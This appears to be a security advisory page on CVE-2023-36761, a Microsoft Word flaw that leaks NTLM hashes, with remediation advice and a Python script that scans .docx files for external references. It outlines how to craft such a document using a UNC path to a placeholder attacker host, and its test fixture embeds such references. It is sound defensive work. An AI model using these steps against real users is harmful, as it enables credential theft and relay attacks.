CVE-2023-36761 — Microsoft Word Information Disclosure Vulnerability

CVE-2023-36761

Microsoft Word — Opening Malicious Document Leaks NTLM Hash to Attacker Server; September 2023 Zero-Day; Credential Relay Risk

What is Microsoft Word?

Microsoft Word is the most widely deployed word processing application globally, part of the Microsoft Office and Microsoft 365 suite. Word processes .doc, .docx, .rtf, and other document formats that may contain embedded remote references — OLE objects, linked images, template references, and embedded resource paths that cause Word to make network connections when the document is opened. When Word makes an SMB or WebDAV connection to an attacker-controlled server, Windows automatically includes the user's NTLM authentication hash in the connection attempt — exposing credentials to the attacker through a credential harvesting technique with a long history in Office exploitation.

Overview

CVE-2023-36761 is an information disclosure vulnerability (CWE-20) in Microsoft Word that allows an attacker to leak the victim's NTLM authentication hash when the victim opens a malicious Word document. The document can be delivered via email, shared drive, or web download; when Word processes the embedded remote reference, it makes an outbound SMB connection to the attacker's server and Windows includes the NTLM hash in the connection attempt. Microsoft patched CVE-2023-36761 in the September 2023 Patch Tuesday as an actively exploited zero-day — with CISA simultaneously adding it to the KEV catalog on September 12, 2023.

CVE-2023-36761 is closely parallel to CVE-2023-36563 (Microsoft WordPad NTLM hash disclosure, patched in October 2023) — both exploit the same Windows NTLM authentication behavior through different Office applications.

Affected Versions

Product                             Affected            Fixed
Microsoft 365 Apps for Enterprise   Multiple versions   September 2023 update
Microsoft Office 2019               Multiple versions   September 2023 update
Microsoft Office LTSC 2021          Multiple versions   September 2023 update
Microsoft Word 2013                 Multiple versions   September 2023 update
Microsoft Word 2016                 Multiple versions   September 2023 update

Technical Details

The NTLM hash disclosure mechanism in Word documents works identically to the WordPad vector (CVE-2023-36563):

  1. Craft a malicious Word document — embed an OLE object, linked image, template reference, or UNC path (\\attacker.example.com\share\resource) in a .doc or .docx file
  2. Deliver the document — send via email attachment, SharePoint, OneDrive link, or other document distribution channel
  3. Victim opens the document — Word attempts to resolve the embedded remote reference, initiating an outbound SMB or WebDAV connection to the attacker's server
  4. Windows sends the NTLM hash — Windows NTLM authentication automatically presents the user's NTLMv2 challenge-response when connecting to the attacker's server; the attacker captures the hash

With the NTLMv2 hash, the attacker can:

  • Crack it offline — target weak passwords with dictionary or GPU-accelerated brute force attacks
  • NTLM relay attack — relay the authentication to internal services (LDAP, SMB, Exchange autodiscover, IIS), impersonating the victim in real time without knowing the plaintext password

The improper input validation (CWE-20) characterization reflects Word's failure to validate that embedded remote references should not trigger NTLM-bearing network connections.
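The remote references named in step 1 are declared in the package's relationship parts of a .docx, so a defender can triage a file before Word ever opens it by reading those parts directly. The following Python is an added example, not code from the advisory or from Microsoft: it lists every relationship marked TargetMode="External" whose target is a UNC path or URL (attached templates and linked images included), run here against a constructed fixture in which attacker.example.com is a placeholder hostname.

```python
# Added example, not from the advisory: triage helper that opens a .docx as a
# zip, reads every *.rels part, and reports relationships marked
# TargetMode="External" whose Target is a UNC path or an http(s)/file URL, i.e.
# the remote references that make Word open an outbound SMB/WebDAV connection.
import io
import re
import xml.etree.ElementTree as ET
import zipfile

REL_NS = "{http://schemas.openxmlformats.org/package/2006/relationships}"
OOXML_REL = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/"
REMOTE_TARGET = re.compile(r"^(\\\\|//|https?://|file://)", re.IGNORECASE)


def find_remote_references(docx_bytes: bytes) -> list:
    """Return one dict per external relationship that points off the host."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as pkg:
        for name in pkg.namelist():
            if not name.endswith(".rels"):
                continue  # only relationship parts carry Target/TargetMode
            root = ET.fromstring(pkg.read(name))
            for rel in root.iter(REL_NS + "Relationship"):
                target = rel.get("Target", "")
                if rel.get("TargetMode") == "External" and REMOTE_TARGET.match(target):
                    findings.append({"part": name,
                                     "type": rel.get("Type", "").rsplit("/", 1)[-1],
                                     "target": target})
    return findings


def build_sample_docx() -> bytes:
    """Constructed fixture, not a real document: just the two relationship parts
    the scanner inspects. attacker.example.com is a placeholder hostname."""
    wrap = ('<?xml version="1.0" encoding="UTF-8"?><Relationships xmlns="'
            + REL_NS[1:-1] + '">{}</Relationships>')
    settings_rels = wrap.format(  # attached template fetched from a UNC path
        f'<Relationship Id="rId1" Type="{OOXML_REL}attachedTemplate" '
        'Target="\\\\attacker.example.com\\share\\template.dotm" TargetMode="External"/>')
    document_rels = wrap.format(  # one internal part plus one linked image over HTTP
        f'<Relationship Id="rId1" Type="{OOXML_REL}styles" Target="styles.xml"/>'
        f'<Relationship Id="rId2" Type="{OOXML_REL}image" '
        'Target="http://attacker.example.com/logo.png" TargetMode="External"/>')
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as pkg:
        pkg.writestr("word/_rels/settings.xml.rels", settings_rels)
        pkg.writestr("word/_rels/document.xml.rels", document_rels)
    return buf.getvalue()
```

On a real file call find_remote_references(open(path, "rb").read()); the check covers OOXML packages (.docx, .dotm) only, and legacy binary .doc files need a separate OLE parser.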

Discovery

Microsoft confirmed CVE-2023-36761 was actively exploited as a zero-day at the time of the September 2023 Patch Tuesday. The September 2023 patch cycle followed a similar disclosure in August 2023 (CVE-2023-36884, Office HTML RCE used by Storm-0978) and preceded October 2023's companion NTLM hash disclosure via WordPad (CVE-2023-36563) — indicating sustained attacker investment in credential theft via Office document delivery in the second half of 2023.

Exploitation Context

NTLM hash exfiltration via Word documents is one of the most cost-effective credential theft techniques:

  • Word documents are delivered and opened routinely in business environments without raising user suspicion
  • The hash exfiltration is completely silent — the user sees the document open normally
  • With the hash, attackers have deniable-origin credentials for lateral movement
  • NTLM relay attacks using the captured hash can escalate a phishing click directly to domain controller access in some configurations (particularly against Exchange autodiscover, ADCS web enrollment endpoints, or SMB shares)

Remediation

  1. Apply the September 2023 Microsoft Office update — patches CVE-2023-36761.
  2. Block outbound SMB (TCP 445) from workstations to internet addresses via firewall rules — prevents the NTLM hash from reaching external attacker servers even if the document exploit succeeds.
  3. Enable Extended Protection for Authentication (EPA) — reduces the effectiveness of NTLM relay attacks by binding authentication to the specific channel.
  4. Evaluate NTLM deprecation — Microsoft recommends moving to Kerberos authentication for all internal services; disabling NTLM on the network eliminates relay attack risk entirely.
  5. Apply Protected View settings — configure Office group policy to open documents from internet-sourced locations in Protected View, which prevents network connection attempts from embedded references until the user explicitly enables editing.

Key Details

Property              Value
CVE ID                CVE-2023-36761
Vendor / Product      Microsoft — Word
NVD Published         2023-09-12
NVD Last Modified     2025-10-28
CVSS 3.1 Score        6.5
CVSS 3.1 Vector       CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N
Severity              MEDIUM
CWE                   CWE-20
CISA KEV Added        2023-09-12
CISA KEV Deadline     2023-10-03
Known Ransomware Use  No

CVSS 3.1 Breakdown

Metric               Value
Attack Vector        Network
Attack Complexity    Low
Privileges Required  None
User Interaction     Required
Scope                Unchanged
Confidentiality      High
Integrity            None
Availability         None

Required Action

CISA BOD 22-01 Deadline: 2023-10-03. Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable.

Timeline

Date        Event
2023-09-12  Microsoft September 2023 Patch Tuesday — CVE-2023-36761 patched as an actively exploited zero-day; CVE published and CISA KEV added on the same day
2023-10-03  CISA BOD 22-01 remediation deadline

References

Resource                                     Type
Microsoft Security Response Center Advisory  Vendor Advisory
NVD — CVE-2023-36761                         Vulnerability Database
CISA KEV Catalog Entry                       US Government